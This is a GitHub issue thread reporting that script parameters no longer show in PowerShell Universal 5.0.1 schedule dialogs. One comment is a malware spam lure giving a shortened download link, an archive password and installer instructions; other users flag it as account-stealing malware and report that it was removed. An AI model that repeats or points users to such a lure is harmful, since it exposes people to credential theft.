### ISSUE TITLE
Script parameters not showing in schedule

### ISSUE THREAD

**Issue by RubenT91** [ironmansoftware/powershell-universal#3662]
### Version

5.0.1

### Severity

High

### Environment

msi

### Steps to Reproduce

Create a new schedule or modify an existing schedule referencing a script that has parameters configured.

### Expected behavior

```console
In previous versions (4.x), the parameters become part of the UI to configure the schedule so you can set values if needed.
```

### Actual behavior

```console
The parameters are not listed in the schedule configuration dialog.
```

### Additional Environment data

Additional Environment Data:

- Operating System: Windows Server 2022 Standard
- PSU Version: 5.0.1

Additional Information:

The customer has reverted back to version 4.3.4 as the new version was not usable, so no further screenshots can be provided.

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by MahouShoujoMivutilde** [comment]
Do **NOT** run it.  

It's malware that'll steal your account if executed, to spread further spamming the same message elsewhere, like happened to this person. 

There are a lot of comments like that

https://github.com/search?q=is%3Aissue+%22In+the+installer+menu%2C+select+%5C%22gcc.%5C%22%22+AND+%22password%3A+changeme%22&type=issues&s=created&o=desc

(and this is how I found this issue)

EDIT:

And it's gone. Good.

**Comment by adamdriscoll** [comment]
@MahouShoujoMivutilde - Our entire repository is getting these messages constantly. They are deleted pretty quickly but seem to be around for at least 5 or 10 minutes.

**Comment by MahouShoujoMivutilde** [comment]
Yeah, I noticed.

I've been going through search, reporting / warning people about similar comments (some people actually try to open and run it, which is... Unexpected, giving what website this is).

This comment was deleted while I was copy-pasting the above message.

**Comment by adamdriscoll** [comment]
Thanks for helping!
